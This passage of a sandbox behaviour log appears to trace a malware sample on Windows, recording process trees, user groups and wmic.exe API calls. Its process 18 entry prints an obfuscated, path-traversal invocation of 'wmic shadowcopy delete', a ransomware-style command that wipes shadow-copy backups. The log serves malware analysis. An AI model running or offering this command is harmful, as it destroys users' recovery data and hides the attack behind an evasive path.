SERVICE\\PlugPlay" [0xe], "NT SERVICE\\Power" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000698e" [0xc000000f], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Thread: id = 304 os_tid = 0x72c Thread: id = 305 os_tid = 0x6f4 Thread: id = 306 os_tid = 0x6e8 Thread: id = 307 os_tid = 0x6dc Thread: id = 308 os_tid = 0x2f4 Thread: id = 309 os_tid = 0x288 Thread: id = 310 os_tid = 0x280 Thread: id = 311 os_tid = 0x27c Thread: id = 312 os_tid = 0x264 Thread: id = 313 os_tid = 0x260 Thread: id = 314 os_tid = 0x25c Thread: id = 315 os_tid = 0x258 Thread: id = 316 os_tid = 0x254 Thread: id = 317 os_tid = 0x248 Thread: id = 318 os_tid = 0x240 Thread: id = 319 os_tid = 0x23c Thread: id = 320 os_tid = 0x234 Process: id = "15" image_name = "rundll32.exe" filename = "c:\\windows\\system32\\rundll32.exe" page_root = "0x4bc3a000" os_pid = "0x52c" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "14" os_parent_pid = "0x230" cmd_line = "rundll32.exe C:\\Windows\\system32\\newdev.dll,pDiDeviceInstallNotification \\\\.\\pipe\\PNP_Device_Install_Pipe_1.{e51d69c6-004d-43e5-ae0f-1d1e40a722a3} \"(null)\"" cur_dir = "C:\\Windows\\system32\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "64" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e213" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 330 os_tid = 0x554 Thread: id = 331 os_tid = 0x54c Thread: id = 332 os_tid = 0x510 Thread: id = 333 os_tid = 0x50c Thread: id = 334 os_tid = 0x3b0 Thread: id = 357 os_tid = 0x654 Process: id = "16" image_name = "dinotify.exe" filename = "c:\\windows\\system32\\dinotify.exe" page_root = "0x4bb53000" os_pid = "0x408" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "15" os_parent_pid = "0x52c" cmd_line = "\"C:\\Windows\\System32\\dinotify.exe\" pnpui.dll,SimplifiedDINotification" cur_dir = "C:\\Windows\\system32\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "64" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e213" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 335 os_tid = 0x244 Thread: id = 336 os_tid = 0x270 Process: id = "17" image_name = "wmiprvse.exe" filename = "c:\\windows\\system32\\wbem\\wmiprvse.exe" page_root = "0x490c8000" os_pid = "0x2fc" os_integrity_level = "0x4000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "14" os_parent_pid = "0x230" cmd_line = "C:\\Windows\\system32\\wbem\\wmiprvse.exe -secured -Embedding" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\Network Service" bitness = "64" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "WMI (Network Service)" [0xf], "NT AUTHORITY\\Logon Session 00000000:0002a388" [0xc000000f] Thread: id = 342 os_tid = 0x324 Thread: id = 343 os_tid = 0x328 Thread: id = 344 os_tid = 0x58c Thread: id = 345 os_tid = 0x2f0 Thread: id = 346 os_tid = 0x300 Thread: id = 347 os_tid = 0x320 Thread: id = 348 os_tid = 0x2ec Process: id = "18" image_name = "wmic.exe" filename = "c:\\windows\\system32\\wbem\\wmic.exe" page_root = "0x4a81c000" os_pid = "0x334" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "12" os_parent_pid = "0x524" cmd_line = "\"C:\\n\\rhrvs\\..\\..\\Windows\\svw\\ci\\qgb\\..\\..\\..\\system32\\m\\d\\taj\\..\\..\\..\\wbem\\pyeqp\\..\\wmic.exe\" shadowcopy delete" cur_dir = "C:\\Windows\\system32\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "64" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e213" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 349 os_tid = 0x514 [0179.504] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1af8d0 | out: lpSystemTimeAsFileTime=0x1af8d0*(dwLowDateTime=0xee1eda60, dwHighDateTime=0x1d5981b)) [0179.504] GetCurrentProcessId () returned 0x334 [0179.504] GetCurrentThreadId () returned 0x514 [0179.505] GetTickCount () returned 0x113452b [0179.505] QueryPerformanceCounter (in: lpPerformanceCount=0x1af8d8 | out: lpPerformanceCount=0x1af8d8*=8509111668) returned 1 [0179.505] GetModuleHandleW (lpModuleName=0x0) returned 0xff590000 [0179.505] __set_app_type (_Type=0x1) [0179.505] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xff5dced0) returned 0x0 [0179.505] __wgetmainargs (in: _Argc=0xff602380, _Argv=0xff602390, _Env=0xff602388, _DoWildCard=0, _StartInfo=0xff60239c | out: _Argc=0xff602380, _Argv=0xff602390, _Env=0xff602388) returned 0 [0179.506] ??0CHString@@QEAA@XZ () returned 0xff602ab0 [0179.508] malloc (_Size=0x30) returned 0x105a40 [0179.508] malloc (_Size=0x70) returned 0x105a80 [0179.508] malloc (_Size=0x50) returned 0x107d50 [0179.508] malloc (_Size=0x30) returned 0x107db0 [0179.508] malloc (_Size=0x48) returned 0x107df0 [0179.508] malloc (_Size=0x30) returned 0x107e40 [0179.508] malloc (_Size=0x30) returned 0x107e80 [0179.508] ??0CHString@@QEAA@XZ () returned 0xff602f58 [0179.508] malloc (_Size=0x30) returned 0x107ec0 [0179.508] ?Empty@CHString@@QEAAXXZ () returned 0x7fef81f482c [0179.508] SetConsoleCtrlHandler (HandlerRoutine=0xff5d5724, Add=1) returned 1 [0179.509] _onexit (_Func=0xff5ef378) returned 0xff5ef378 [0179.509] _onexit (_Func=0xff5ef490) returned 0xff5ef490 [0179.509] _onexit (_Func=0xff5ef4d0) returned 0xff5ef4d0 [0179.509] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0179.509] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0179.512] CoInitializeSecurity (pSecDesc=0x0, cAuthSvc=-1, asAuthSvc=0x0, pReserved1=0x0, dwAuthnLevel=0x1, dwImpLevel=0x3, pAuthList=0x0, dwCapabilities=0x0, pReserved3=0x0) returned 0x0 [0179.546] CoCreateInstance (in: rclsid=0xff5973a0*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0xff597370*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0xff602940 | out: ppv=0xff602940*=0x1b91390) returned 0x0 [0179.557] GetCurrentProcess () returned 0xffffffffffffffff [0179.557] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x28, TokenHandle=0x1af6a0 | out: TokenHandle=0x1af6a0*=0xf4) returned 1 [0179.557] GetTokenInformation (in: TokenHandle=0xf4, TokenInformationClass=0x3, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x1af698 | out: TokenInformation=0x0, ReturnLength=0x1af698) returned 0 [0179.557] malloc (_Size=0x40) returned 0x107f00 [0179.557] GetTokenInformation (in: TokenHandle=0xf4, TokenInformationClass=0x3, TokenInformation=0x107f00, TokenInformationLength=0x40, ReturnLength=0x1af698 | out: TokenInformation=0x107f00, ReturnLength=0x1af698) returned 1 [0179.557] AdjustTokenPrivileges (in: TokenHandle=0xf4, DisableAllPrivileges=0, NewState=0x107f00*(PrivilegesCount=0x5, Privileges=((Luid.LowPart=0x13, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=3, Attributes=0x19), (Luid.LowPart=0x2, Luid.HighPart=33, Attributes=0x0), (Luid.LowPart=0x22, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=71191928, Attributes=0x9664))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0179.557] free (_Block=0x107f00) [0179.557] CloseHandle (hObject=0xf4) returned 1 [0179.558] malloc (_Size=0x40) returned 0x107f00 [0179.558] malloc (_Size=0x40) returned 0x107f50 [0179.558] malloc (_Size=0x40) returned 0x1069e0 [0179.558] malloc (_Size=0x20a) returned 0x106a30 [0179.558] GetSystemDirectoryW (in: lpBuffer=0x106a30, uSize=0x105 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0179.558] free (_Block=0x106a30) [0179.558] malloc (_Size=0x18) returned 0x2bdfb0 [0179.558] malloc (_Size=0x18) returned 0x107fa0 [0179.558] malloc (_Size=0x18) returned 0x106a30 [0179.558] SysStringLen (param_1="C:\\Windows\\system32") returned 0x13 [0179.558] SysStringLen (param_1="\\kernel32.dll") returned 0xd [0179.558] free (_Block=0x2bdfb0) [0179.558] free (_Block=0x107fa0) [0179.558] LoadLibraryW (lpLibFileName="C:\\Windows\\system32\\kernel32.dll") returned 0x77220000 [0179.558] GetProcAddress (hModule=0x77220000, lpProcName="SetThreadUILanguage") returned 0x77236d40 [0179.558] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0179.559] FreeLibrary (hLibModule=0x77220000) returned 1 [0179.559] free (_Block=0x106a30) [0179.559] _vsnwprintf (in: _Buffer=0x1069e0, _BufferCount=0x1f, _Format="ms_%x", _ArgList=0x1af2c8 | out: _Buffer="ms_409") returned 6 [0179.559] malloc (_Size=0x20) returned 0x107fa0 [0179.559] GetComputerNameW (in: lpBuffer=0x107fa0, nSize=0x1af6a0 | out: lpBuffer="XDUWTFONO", nSize=0x1af6a0) returned 1 [0179.559] lstrlenW (lpString="XDUWTFONO") returned 9 [0179.559] malloc (_Size=0x14) returned 0x2bdfb0 [0179.559] lstrlenW (lpString="XDUWTFONO") returned 9 [0179.559] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x0, nSize=0x1af698 | out: lpNameBuffer=0x0, nSize=0x1af698) returned 0x7fffffdd000 [0179.560] GetLastError () returned 0xea [0179.560] malloc (_Size=0x40) returned 0x106a30 [0179.560] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x106a30, nSize=0x1af698 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x1af698) returned 0x1 [0179.561] lstrlenW (lpString="") returned 0 [0179.561] lstrlenW (lpString="XDUWTFONO") returned 9 [0179.561] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="XDUWTFONO", cchCount1=9, lpString2="", cchCount2=0) returned 3 [0179.563] lstrlenW (lpString=".") returned 1 [0179.563] lstrlenW (lpString="XDUWTFONO") returned 9 [0179.563] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="XDUWTFONO", cchCount1=9, lpString2=".", cchCount2=1) returned 3 [0179.563] lstrlenW (lpString="LOCALHOST") returned 9 [0179.563] lstrlenW (lpString="XDUWTFONO") returned 9 [0179.563] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="XDUWTFONO", cchCount1=9, lpString2="LOCALHOST", cchCount2=9) returned 3 [0179.563] lstrlenW (lpString="XDUWTFONO") returned 9 [0179.563] lstrlenW (lpString="XDUWTFONO") returned 9 [0179.563] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="XDUWTFONO", cchCount1=9, lpString2="XDUWTFONO", cchCount2=9) returned 2 [0179.563] free (_Block=0x2bdfb0) [0179.563] lstrlenW (lpString="XDUWTFONO") returned 9 [0179.563] malloc (_Size=0x14) returned 0x2bdfb0 [0179.563] lstrlenW (lpString="XDUWTFONO") returned 9 [0179.563] lstrlenW (lpString="XDUWTFONO") returned 9 [0179.563] malloc (_Size=0x14) returned 0x106a80 [0179.563] lstrlenW (lpString="XDUWTFONO") returned 9 [0179.563] malloc (_Size=0x8) returned 0x106aa0 [0179.563] malloc (_Size=0x18) returned 0x106ac0 [0179.563] malloc (_Size=0x30) returned 0x106ae0 [0179.563] malloc (_Size=0x18) returned 0x106b20 [0179.563] SysStringLen (param_1="IDENTIFY") returned 0x8 [0179.563] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0179.563] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0179.563] SysStringLen (param_1="IDENTIFY") returned 0x8 [0179.563] malloc (_Size=0x30) returned 0x106b40 [0179.563] malloc (_Size=0x18) returned 0x106b80 [0179.563] SysStringLen (param_1="IMPERSONATE") returned 0xb [0179.563] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0179.563] SysStringLen (param_1="IMPERSONATE") returned 0xb [0179.563] SysStringLen (param_1="IDENTIFY") returned 0x8 [0179.563] SysStringLen (param_1="IDENTIFY") returned 0x8 [0179.563] SysStringLen (param_1="IMPERSONATE") returned 0xb [0179.564] malloc (_Size=0x30) returned 0x106ba0 [0179.564] malloc (_Size=0x18) returned 0x106be0 [0179.564] SysStringLen (param_1="DELEGATE") returned 0x8 [0179.564] SysStringLen (param_1="IDENTIFY") returned 0x8 [0179.564] SysStringLen (param_1="DELEGATE") returned 0x8 [0179.564] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0179.564] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0179.564] SysStringLen (param_1="DELEGATE") returned 0x8 [0179.564] malloc (_Size=0x30) returned 0x106c00 [0179.564] malloc (_Size=0x18) returned 0x106c40 [0179.564] malloc (_Size=0x30) returned 0x106c60 [0179.564] malloc (_Size=0x18) returned 0x106ca0 [0179.564] SysStringLen (param_1="NONE") returned 0x4 [0179.564] SysStringLen (param_1="DEFAULT") returned 0x7 [0179.564] SysStringLen (param_1="DEFAULT") returned 0x7 [0179.564] SysStringLen (param_1="NONE") returned 0x4 [0179.564] malloc (_Size=0x30) returned 0x106cc0 [0179.564] malloc (_Size=0x18) returned 0x106d00 [0179.564] SysStringLen (param_1="CONNECT") returned 0x7 [0179.564] SysStringLen (param_1="DEFAULT") returned 0x7 [0179.564] malloc (_Size=0x30) returned 0x106d20 [0179.564] malloc (_Size=0x18) returned 0x106d60 [0179.564] SysStringLen (param_1="CALL") returned 0x4 [0179.564] SysStringLen (param_1="DEFAULT") returned 0x7 [0179.564] SysStringLen (param_1="CALL") returned 0x4 [0179.564] SysStringLen (param_1="CONNECT") returned 0x7 [0179.564] malloc (_Size=0x30) returned 0x106d80 [0179.564] malloc (_Size=0x18) returned 0x106dc0 [0179.564] SysStringLen (param_1="PKT") returned 0x3 [0179.565] SysStringLen (param_1="DEFAULT") returned 0x7 [0179.565] SysStringLen (param_1="PKT") returned 0x3 [0179.565] SysStringLen (param_1="NONE") returned 0x4 [0179.565] SysStringLen (param_1="NONE") returned 0x4 [0179.565] SysStringLen (param_1="PKT") returned 0x3 [0179.565] malloc (_Size=0x30) returned 0x106de0 [0179.565] malloc (_Size=0x18) returned 0x106e20 [0179.565] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0179.565] SysStringLen (param_1="DEFAULT") returned 0x7 [0179.565] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0179.565] SysStringLen (param_1="NONE") returned 0x4 [0179.565] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0179.565] SysStringLen (param_1="PKT") returned 0x3 [0179.565] SysStringLen (param_1="PKT") returned 0x3 [0179.565] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0179.565] malloc (_Size=0x30) returned 0x108000 [0179.566] malloc (_Size=0x18) returned 0x106e40 [0179.566] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0179.566] SysStringLen (param_1="DEFAULT") returned 0x7 [0179.566] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0179.566] SysStringLen (param_1="PKT") returned 0x3 [0179.566] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0179.566] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0179.566] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0179.566] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0179.566] malloc (_Size=0x30) returned 0x108040 [0179.566] malloc (_Size=0x40) returned 0x106e60 [0179.566] malloc (_Size=0x20a) returned 0x106eb0 [0179.566] GetSystemDirectoryW (in: lpBuffer=0x106eb0, uSize=0x105 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0179.566] free (_Block=0x106eb0) [0179.566] malloc (_Size=0x18) returned 0x106eb0 [0179.566] malloc (_Size=0x18) returned 0x106ed0 [0179.566] malloc (_Size=0x18) returned 0x106ef0 [0179.566] SysStringLen (param_1="C:\\Windows\\system32") returned 0x13 [0179.566] SysStringLen (param_1="\\wbem\\") returned 0x6 [0179.566] free (_Block=0x106eb0) [0179.566] free (_Block=0x106ed0) [0179.566] SysStringByteLen (bstr="C:\\Windows\\system32\\wbem\\") returned 0x32 [0179.566] free (_Block=0x106ef0) [0179.566] malloc (_Size=0x18) returned 0x109400 [0179.566] malloc (_Size=0x18) returned 0x109420 [0179.567] malloc (_Size=0x18) returned 0x109440 [0179.567] SysStringLen (param_1="C:\\Windows\\system32\\wbem\\") returned 0x19 [0179.567] SysStringLen (param_1="XSL-Mappings.xml") returned 0x10 [0179.567] free (_Block=0x109400) [0179.567] free (_Block=0x109420) [0179.567] GetCurrentThreadId () returned 0x514 [0179.567] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Wbem\\CIMOM", ulOptions=0x0, samDesired=0x1, phkResult=0x1aefa0 | out: phkResult=0x1aefa0*=0xf8) returned 0x0 [0179.567] RegQueryValueExW (in: hKey=0xf8, lpValueName="Logging", lpReserved=0x0, lpType=0x0, lpData=0x1aeff0, lpcbData=0x1aef90*=0x400 | out: lpType=0x0, lpData=0x1aeff0*=0x30, lpcbData=0x1aef90*=0x4) returned 0x0 [0179.567] _wcsicmp (_String1="0", _String2="1") returned -1 [0179.567] _wcsicmp (_String1="0", _String2="2") returned -2 [0179.567] RegQueryValueExW (in: hKey=0xf8, lpValueName="Logging Directory", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1aef90*=0x4 | out: lpType=0x0, lpData=0x0, lpcbData=0x1aef90*=0x42) returned 0x0 [0179.567] malloc (_Size=0x86) returned 0x106eb0 [0179.567] RegQueryValueExW (in: hKey=0xf8, lpValueName="Logging Directory", lpReserved=0x0, lpType=0x0, lpData=0x106eb0, lpcbData=0x1aef90*=0x42 | out: lpType=0x0, lpData=0x106eb0*=0x25, lpcbData=0x1aef90*=0x42) returned 0x0 [0179.567] lstrlenW (lpString="%systemroot%\\system32\\wbem\\Logs\\") returned 32 [0179.567] malloc (_Size=0x42) returned 0x106f40 [0179.567] lstrlenW (lpString="%systemroot%\\system32\\wbem\\Logs\\") returned 32 [0179.567] RegQueryValueExW (in: hKey=0xf8, lpValueName="Log File Max Size", lpReserved=0x0, lpType=0x0, lpData=0x1aeff0, lpcbData=0x1aef90*=0x400 | out: lpType=0x0, lpData=0x1aeff0*=0x36, lpcbData=0x1aef90*=0xc) returned 0x0 [0179.567] _wtol (_String="65536") returned 65536 [0179.567] free (_Block=0x106eb0) [0179.567] RegCloseKey (hKey=0x0) returned 0x6 [0179.567] CoCreateInstance (in: rclsid=0xff597410*(Data1=0xf6d90f12, Data2=0x9c73, Data3=0x11d3, Data4=([0]=0xb3, [1]=0x2e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0xb, [7]=0xb4)), pUnkOuter=0x0, dwClsContext=0x1, riid=0xff5973f0*(Data1=0x2933bf95, Data2=0x7b36, Data3=0x11d2, Data4=([0]=0xb2, [1]=0xe, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x98, [6]=0x3e, [7]=0x60)), ppv=0x1af498 | out: ppv=0x1af498*=0x1f671d0) returned 0x0 [0179.867] FreeThreadedDOMDocument:IXMLDOMDocument:load (in: This=0x1f671d0, xmlSource=0x1af5e0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Windows\\system32\\wbem\\XSL-Mappings.xml", varVal2=0x106eb0), isSuccessful=0x1af650 | out: isSuccessful=0x1af650*=0xffff) returned 0x0 [0180.197] FreeThreadedDOMDocument:IXMLDOMDocument:get_documentElement (in: This=0x1f671d0, DOMElement=0x1af490 | out: DOMElement=0x1af490*=0x1f6bc50) returned 0x0 [0180.197] malloc (_Size=0x18) returned 0x109420 [0180.197] IXMLDOMElement:getElementsByTagName (in: This=0x1f6bc50, tagName="XSLFORMAT", resultList=0x1af4a0 | out: resultList=0x1af4a0*=0x1f69cc0) returned 0x0 [0180.199] free (_Block=0x109420) [0180.199] IXMLDOMNodeList:get_length (in: This=0x1f69cc0, listLength=0x1af668 | out: listLength=0x1af668*=21) returned 0x0 [0180.199] IXMLDOMNodeList:get_item (in: This=0x1f69cc0, index=0, listItem=0x1af470 | out: listItem=0x1af470*=0x1f6bd50) returned 0x0 [0180.199] IXMLDOMNode:get_text (in: This=0x1f6bd50, text=0x1af480 | out: text=0x1af480*="texttable.xsl") returned 0x0 [0180.200] IXMLDOMNode:get_attributes (in: This=0x1f6bd50, attributeMap=0x1af478 | out: attributeMap=0x1af478*=0x1f678d0) returned 0x0 [0180.200] malloc (_Size=0x18) returned 0x109420 [0180.200] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x1f678d0, name="KEYWORD", namedItem=0x1af488 | out: namedItem=0x1af488*=0x1f6a280) returned 0x0 [0180.200] free (_Block=0x109420) [0180.200] IXMLDOMNode:get_nodeValue (in: This=0x1f6a280, value=0x1af4c0 | out: value=0x1af4c0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="TABLE", varVal2=0x60070001c)) returned 0x0 [0180.200] malloc (_Size=0x18) returned 0x109420 [0180.200] malloc (_Size=0x18) returned 0x109400 [0180.200] malloc (_Size=0x30) returned 0x108080 [0180.200] IUnknown:Release (This=0x1f6bd50) returned 0x0 [0180.200] IUnknown:Release (This=0x1f678d0) returned 0x0 [0180.200] IUnknown:Release (This=0x1f6a280) returned 0x0 [0180.200] IXMLDOMNodeList:get_item (in: This=0x1f69cc0, index=1, listItem=0x1af470 | out: listItem=0x1af470*=0x1f6bd50) returned 0x0 [0180.200] IXMLDOMNode:get_text (in: This=0x1f6bd50, text=0x1af480 | out: text=0x1af480*="textvaluelist.xsl") returned 0x0 [0180.200] IXMLDOMNode:get_attributes (in: This=0x1f6bd50, attributeMap=0x1af478 | out: attributeMap=0x1af478*=0x1f678d0) returned 0x0 [0180.200] malloc (_Size=0x18) returned 0x109460 [0180.201] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x1f678d0, name="KEYWORD", namedItem=0x1af488 | out: namedItem=0x1af488*=0x1f6a280) returned 0x0 [0180.201] free (_Block=0x109460) [0180.201] IXMLDOMNode:get_nodeValue (in: This=0x1f6a280, value=0x1af4c0 | out: value=0x1af4c0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="VALUE", varVal2=0x60070001c)) returned 0x0 [0180.201] malloc (_Size=0x18) returned 0x109460 [0180.201] malloc (_Size=0x18) returned 0x109480 [0180.201] SysStringLen (param_1="VALUE") returned 0x5 [0180.201] SysStringLen (param_1="TABLE") returned 0x5 [0180.201] SysStringLen (param_1="TABLE") returned 0x5 [0180.201] SysStringLen (param_1="VALUE") returned 0x5 [0180.201] malloc (_Size=0x30) returned 0x1080c0 [0180.201] IUnknown:Release (This=0x1f6bd50) returned 0x0 [0180.201] IUnknown:Release (This=0x1f678d0) returned 0x0 [0180.201] IUnknown:Release (This=0x1f6a280) returned 0x0 [0180.201] IXMLDOMNodeList:get_item (in: This=0x1f69cc0, index=2, listItem=0x1af470 | out: listItem=0x1af470*=0x1f6bd50) returned 0x0 [0180.201] IXMLDOMNode:get_text (in: This=0x1f6bd50, text=0x1af480 | out: text=0x1af480*="textvaluelist.xsl") returned 0x0 [0180.201] IXMLDOMNode:get_attributes (in: This=0x1f6bd50, attributeMap=0x1af478 | out: attributeMap=0x1af478*=0x1f678d0) returned 0x0 [0180.201] malloc (_Size=0x18) returned 0x1094a0 [0180.201] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x1f678d0, name="KEYWORD", namedItem=0x1af488 | out: namedItem=0x1af488*=0x1f6a280) returned 0x0 [0180.201] free (_Block=0x1094a0) [0180.201] IXMLDOMNode:get_nodeValue (in: This=0x1f6a280, value=0x1af4c0 | out: value=0x1af4c0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="LIST", varVal2=0x60070001c)) returned 0x0 [0180.201] malloc (_Size=0x18) returned 0x1094a0 [0180.201] malloc (_Size=0x18) returned 0x1094c0 [0180.201] SysStringLen (param_1="LIST") returned 0x4 [0180.202] SysStringLen (param_1="TABLE") returned 0x5 [0180.202] malloc (_Size=0x30) returned 0x108100 [0180.202] IUnknown:Release (This=0x1f6bd50) returned 0x0 [0180.202] IUnknown:Release (This=0x1f678d0) returned 0x0 [0180.202] IUnknown:Release (This=0x1f6a280) returned 0x0 [0180.202] IXMLDOMNodeList:get_item (in: This=0x1f69cc0, index=3, listItem=0x1af470 | out: listItem=0x1af470*=0x1f6bd50) returned 0x0 [0180.202] IXMLDOMNode:get_text (in: This=0x1f6bd50, text=0x1af480 | out: text=0x1af480*="rawxml.xsl") returned 0x0 [0180.202] IXMLDOMNode:get_attributes (in: This=0x1f6bd50, attributeMap=0x1af478 | out: attributeMap=0x1af478*=0x1f678d0) returned 0x0 [0180.202] malloc (_Size=0x18) returned 0x1094e0 [0180.202] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x1f678d0, name="KEYWORD", namedItem=0x1af488 | out: namedItem=0x1af488*=0x1f6a280) returned 0x0 [0180.202] free (_Block=0x1094e0) [0180.202] IXMLDOMNode:get_nodeValue (in: This=0x1f6a280, value=0x1af4c0 | out: value=0x1af4c0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="RAWXML", varVal2=0x60070001c)) returned 0x0 [0180.202] malloc (_Size=0x18) returned 0x1094e0 [0180.202] malloc (_Size=0x18) returned 0x109500 [0180.202] SysStringLen (param_1="RAWXML") returned 0x6 [0180.202] SysStringLen (param_1="TABLE") returned 0x5 [0180.202] SysStringLen (param_1="RAWXML") returned 0x6 [0180.202] SysStringLen (param_1="LIST") returned 0x4 [0180.202] SysStringLen (param_1="LIST") returned 0x4 [0180.202] SysStringLen (param_1="RAWXML") returned 0x6 [0180.202] malloc (_Size=0x30) returned 0x108140 [0180.202] IUnknown:Release (This=0x1f6bd50) returned 0x0 [0180.202] IUnknown:Release (This=0x1f678d0) returned 0x0 [0180.202] IUnknown:Release (This=0x1f6a280) returned 0x0 [0180.202] IXMLDOMNodeList:get_item (in: This=0x1f69cc0, index=4, listItem=0x1af470 | out: listItem=0x1af470*=0x1f6bd50) returned 0x0 [0180.202] IXMLDOMNode:get_text (in: This=0x1f6bd50, text=0x1af480 | out: text=0x1af480*="htable.xsl") returned 0x0 [0180.203] IXMLDOMNode:get_attributes (in: This=0x1f6bd50, attributeMap=0x1af478 | out: attributeMap=0x1af478*=0x1f678d0) returned 0x0 [0180.203] malloc (_Size=0x18) returned 0x109520 [0180.203] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x1f678d0, name="KEYWORD", namedItem=0x1af488 | out: namedItem=0x1af488*=0x1f6a280) returned 0x0 [0180.203] free (_Block=0x109520) [0180.203] IXMLDOMNode:get_nodeValue (in: This=0x1f6a280, value=0x1af4c0 | out: value=0x1af4c0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="HTABLE", varVal2=0x60070001c)) returned 0x0 [0180.203] malloc (_Size=0x18) returned 0x109520 [0180.203] malloc (_Size=0x18) returned 0x109540 [0180.203] SysStringLen (param_1="HTABLE") returned 0x6 [0180.203] SysStringLen (param_1="TABLE") returned 0x5 [0180.203] SysStringLen (param_1="HTABLE") returned 0x6 [0180.203] SysStringLen (param_1="LIST") returned 0x4 [0180.203] malloc (_Size=0x30) returned 0x108180 [0180.203] IUnknown:Release (This=0x1f6bd50) returned 